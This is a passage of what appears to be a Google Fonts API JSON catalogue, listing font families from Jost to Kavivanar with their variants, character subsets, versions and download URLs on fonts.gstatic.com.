\"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7myjJAVGPokMmuHL.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7mwjJQVGPokMmuHL.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7mz9JQVGPokMmuHL.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7myjJQVGPokMmuHL.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7myRJQVGPokMmuHL.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7mx9IgVGPokMmuHL.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7mxEIgVGPokMmuHL.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7mwjIgVGPokMmuHL.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7mwKIgVGPokMmuHL.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZu0ENI0un_HLMEo.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZm0FNI0un_HLMEo.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZrMFNI0un_HLMEo.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZu0FNI0un_HLMEo.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZt8FNI0un_HLMEo.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZjMCNI0un_HLMEo.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZgoCNI0un_HLMEo.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZm0CNI0un_HLMEo.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZkQCNI0un_HLMEo.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Joti One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/jotione/v21/Z9XVDmdJQAmWm9TwaYTe4u2El6GC.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Jua\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/jua/v13/co3KmW9ljjAjc-DZCsKgsg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Judson\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/judson/v18/FeVRS0Fbvbc14VxRD7N01bV7kg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/judson/v18/FeVTS0Fbvbc14VxhDblw97BrknZf.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/judson/v18/FeVSS0Fbvbc14Vxps5xQ3Z5nm29Gww.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Julee\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/julee/v22/TuGfUVB3RpZPQ6ZLodgzydtk.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Julius Sans One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/juliussansone/v14/1Pt2g8TAX_SGgBGUi0tGOYEga5W-xXEW6aGXHw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Junge\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/junge/v20/gokgH670Gl1lUqAdvhB7SnKm.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Jura\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"kayah-li\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/jura/v24/z7NOdRfiaC4Vd8hhoPzfb5vBTP0D7auhTfmrH_rt.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/jura/v24/z7NOdRfiaC4Vd8hhoPzfb5vBTP1d7auhTfmrH_rt.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/jura/v24/z7NOdRfiaC4Vd8hhoPzfb5vBTP1v7auhTfmrH_rt.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/jura/v24/z7NOdRfiaC4Vd8hhoPzfb5vBTP2D6quhTfmrH_rt.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/jura/v24/z7NOdRfiaC4Vd8hhoPzfb5vBTP266quhTfmrH_rt.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Just Another Hand\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/justanotherhand/v19/845CNN4-AJyIGvIou-6yJKyptyOpOcr_BmmlS5aw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Just Me Again Down Here\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/justmeagaindownhere/v24/MwQmbgXtz-Wc6RUEGNMc0QpRrfUh2hSdBBMoAuwHvqDwc_fg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"K2D\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/k2d/v9/J7aRnpF2V0ErE6UpvrIw74NL.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/k2d/v9/J7afnpF2V0EjdZ1NtLYS6pNLAjk.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/k2d/v9/J7aenpF2V0Erv4QJlJw85ppSGw.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/k2d/v9/J7acnpF2V0EjdZ3hlZY4xJ9CGyAa.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/k2d/v9/J7aenpF2V0Er24cJlJw85ppSGw.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/k2d/v9/J7acnpF2V0EjdZ2FlpY4xJ9CGyAa.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/k2d/v9/J7aTnpF2V0ETd68tnLcg7w.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/k2d/v9/J7aRnpF2V0EjdaUpvrIw74NL.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/k2d/v9/J7aenpF2V0Erg4YJlJw85ppSGw.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/k2d/v9/J7acnpF2V0EjdZ3dl5Y4xJ9CGyAa.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/k2d/v9/J7aenpF2V0Err4EJlJw85ppSGw.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/k2d/v9/J7acnpF2V0EjdZ3xkJY4xJ9CGyAa.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/k2d/v9/J7aenpF2V0Ery4AJlJw85ppSGw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/k2d/v9/J7acnpF2V0EjdZ2VkZY4xJ9CGyAa.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/k2d/v9/J7aenpF2V0Er14MJlJw85ppSGw.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/k2d/v9/J7acnpF2V0EjdZ2JkpY4xJ9CGyAa.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kadwa\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kadwa/v10/rnCm-x5V0g7iphTHRcc2s2XH.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/kadwa/v10/rnCr-x5V0g7ipix7auM-mHnOSOuk.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kaisei Decol\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kaiseidecol/v8/bMrwmSqP45sidWf3QmfFW6iyW1EP22OjoA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/kaiseidecol/v8/bMrvmSqP45sidWf3QmfFW6iKr3gr00i_qb57kA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/kaiseidecol/v8/bMrvmSqP45sidWf3QmfFW6iK534r00i_qb57kA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kaisei HarunoUmi\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kaiseiharunoumi/v8/HI_RiZQSLqBQoAHhK_C6N_nzy_jcGsv5sM8u3mk.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/kaiseiharunoumi/v8/HI_WiZQSLqBQoAHhK_C6N_nzy_jcIj_QlMcFwmC9FAU.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/kaiseiharunoumi/v8/HI_WiZQSLqBQoAHhK_C6N_nzy_jcInfWlMcFwmC9FAU.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kaisei Opti\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kaiseiopti/v8/QldKNThJphYb8_g6c2nlIFle7KlmxuHx.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/kaiseiopti/v8/QldXNThJphYb8_g6c2nlIGGqxY1u7f34DYwn.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/kaiseiopti/v8/QldXNThJphYb8_g6c2nlIGHiw41u7f34DYwn.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kaisei Tokumin\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kaiseitokumin/v8/Gg8sN5wdZg7xCwuMsylww2ZiQkJf1l0pj946.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/kaiseitokumin/v8/Gg8vN5wdZg7xCwuMsylww2ZiQnqr_3khpMIzeI6v.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/kaiseitokumin/v8/Gg8vN5wdZg7xCwuMsylww2ZiQnrj-XkhpMIzeI6v.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/kaiseitokumin/v8/Gg8vN5wdZg7xCwuMsylww2ZiQnr_-nkhpMIzeI6v.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kalam\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/kalam/v16/YA9Qr0Wd4kDdMtD6GgLLmCUItqGt.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/kalam/v16/YA9dr0Wd4kDdMuhWMibDszkB.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/kalam/v16/YA9Qr0Wd4kDdMtDqHQLLmCUItqGt.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kameron\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kameron/v15/vm82dR7vXErQxuznsL4wL-XIYH8.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/kameron/v15/vm8zdR7vXErQxuzniAIfC-3jfHb--NY.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kanit\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/kanit/v12/nKKX-Go6G5tXcr72GwWKcaxALFs.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/kanit/v12/nKKV-Go6G5tXcraQI2GAdY5FPFtrGw.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/kanit/v12/nKKU-Go6G5tXcr5aOiWgX6BJNUJy.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/kanit/v12/nKKS-Go6G5tXcraQI82hVaRrMFJyAu4.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/kanit/v12/nKKU-Go6G5tXcr4-OSWgX6BJNUJy.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/kanit/v12/nKKS-Go6G5tXcraQI6miVaRrMFJyAu4.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/kanit/v12/nKKZ-Go6G5tXcoaSEQGodLxA.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/kanit/v12/nKKX-Go6G5tXcraQGwWKcaxALFs.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/kanit/v12/nKKU-Go6G5tXcr5mOCWgX6BJNUJy.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/kanit/v12/nKKS-Go6G5tXcraQI_GjVaRrMFJyAu4.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/kanit/v12/nKKU-Go6G5tXcr5KPyWgX6BJNUJy.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/kanit/v12/nKKS-Go6G5tXcraQI92kVaRrMFJyAu4.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/kanit/v12/nKKU-Go6G5tXcr4uPiWgX6BJNUJy.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/kanit/v12/nKKS-Go6G5tXcraQI7mlVaRrMFJyAu4.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/kanit/v12/nKKU-Go6G5tXcr4yPSWgX6BJNUJy.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/kanit/v12/nKKS-Go6G5tXcraQI6WmVaRrMFJyAu4.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/kanit/v12/nKKU-Go6G5tXcr4WPCWgX6BJNUJy.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/kanit/v12/nKKS-Go6G5tXcraQI4GnVaRrMFJyAu4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kantumruy\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"khmer\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/kantumruy/v21/syk0-yJ0m7wyVb-f4FOPUtDlpn-UJ1H6Uw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/kantumruy/v21/sykx-yJ0m7wyVb-f4FO3_vjBrlSILg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/kantumruy/v21/syk0-yJ0m7wyVb-f4FOPQtflpn-UJ1H6Uw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kantumruy Pro\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/kantumruypro/v3/1q2TY5aECkp34vEBSPFOmJxwvk_pilU8OGNfyg1urUs0M34dR6dW.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/kantumruypro/v3/1q2TY5aECkp34vEBSPFOmJxwvk_pilU8OGNfyg3urEs0M34dR6dW.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/kantumruypro/v3/1q2TY5aECkp34vEBSPFOmJxwvk_pilU8OGNfyg0wrEs0M34dR6dW.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/kantumruypro/v3/1q2TY5aECkp34vEBSPFOmJxwvk_pilU8OGNfyg1urEs0M34dR6dW.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/kantumruypro/v3/1q2TY5aECkp34vEBSPFOmJxwvk_pilU8OGNfyg1crEs0M34dR6dW.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/kantumruypro/v3/1q2TY5aECkp34vEBSPFOmJxwvk_pilU8OGNfyg2wq0s0M34dR6dW.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/kantumruypro/v3/1q2TY5aECkp34vEBSPFOmJxwvk_pilU8OGNfyg2Jq0s0M34dR6dW.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/kantumruypro/v3/1q2RY5aECkp34vEBSPFOmJxwlEbbdY1VU_nxzRim76N2OXo_QrdWlcU.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/kantumruypro/v3/1q2RY5aECkp34vEBSPFOmJxwlEbbdY1VU_nxzRim7yN3OXo_QrdWlcU.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/kantumruypro/v3/1q2RY5aECkp34vEBSPFOmJxwlEbbdY1VU_nxzRim7_13OXo_QrdWlcU.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/kantumruypro/v3/1q2RY5aECkp34vEBSPFOmJxwlEbbdY1VU_nxzRim76N3OXo_QrdWlcU.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/kantumruypro/v3/1q2RY5aECkp34vEBSPFOmJxwlEbbdY1VU_nxzRim75F3OXo_QrdWlcU.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/kantumruypro/v3/1q2RY5aECkp34vEBSPFOmJxwlEbbdY1VU_nxzRim731wOXo_QrdWlcU.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/kantumruypro/v3/1q2RY5aECkp34vEBSPFOmJxwlEbbdY1VU_nxzRim70RwOXo_QrdWlcU.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Karantina\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/karantina/v11/buExpo24ccnh31GVMABxXCgf-P5Oaiw4cw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/karantina/v11/buE0po24ccnh31GVMABJ8AA78NVSYw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/karantina/v11/buExpo24ccnh31GVMABxTC8f-P5Oaiw4cw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Karla\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/karla/v23/qkBIXvYC6trAT55ZBi1ueQVIjQTDeJqqFENLR7fHGw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/karla/v23/qkBIXvYC6trAT55ZBi1ueQVIjQTDppqqFENLR7fHGw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/karla/v23/qkBIXvYC6trAT55ZBi1ueQVIjQTD-JqqFENLR7fHGw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/karla/v23/qkBIXvYC6trAT55ZBi1ueQVIjQTDypqqFENLR7fHGw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/karla/v23/qkBIXvYC6trAT55ZBi1ueQVIjQTDJp2qFENLR7fHGw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/karla/v23/qkBIXvYC6trAT55ZBi1ueQVIjQTDH52qFENLR7fHGw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/karla/v23/qkBIXvYC6trAT55ZBi1ueQVIjQTDeJ2qFENLR7fHGw.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/karla/v23/qkBKXvYC6trAT7RQNNK2EG7SIwPWMNnCV0lPZbLXGxGR.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/karla/v23/qkBKXvYC6trAT7RQNNK2EG7SIwPWMNkcV0lPZbLXGxGR.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/karla/v23/qkBKXvYC6trAT7RQNNK2EG7SIwPWMNlCV0lPZbLXGxGR.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/karla/v23/qkBKXvYC6trAT7RQNNK2EG7SIwPWMNlwV0lPZbLXGxGR.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/karla/v23/qkBKXvYC6trAT7RQNNK2EG7SIwPWMNmcUElPZbLXGxGR.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/karla/v23/qkBKXvYC6trAT7RQNNK2EG7SIwPWMNmlUElPZbLXGxGR.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/karla/v23/qkBKXvYC6trAT7RQNNK2EG7SIwPWMNnCUElPZbLXGxGR.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Karma\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/karma/v16/va9F4kzAzMZRGLjDY8Z_uqzGQC_-.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/karma/v16/va9I4kzAzMZRGIBvS-J3kbDP.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/karma/v16/va9F4kzAzMZRGLibYsZ_uqzGQC_-.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/karma/v16/va9F4kzAzMZRGLi3ZcZ_uqzGQC_-.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/karma/v16/va9F4kzAzMZRGLjTZMZ_uqzGQC_-.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Katibeh\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/katibeh/v17/ZGjXol5MQJog4bxDaC1RVDNdGDs.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kaushan Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/kaushanscript/v14/vm8vdRfvXFLG3OLnsO15WYS5DF7_ytN3M48a.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Kavivanar\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tamil\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": 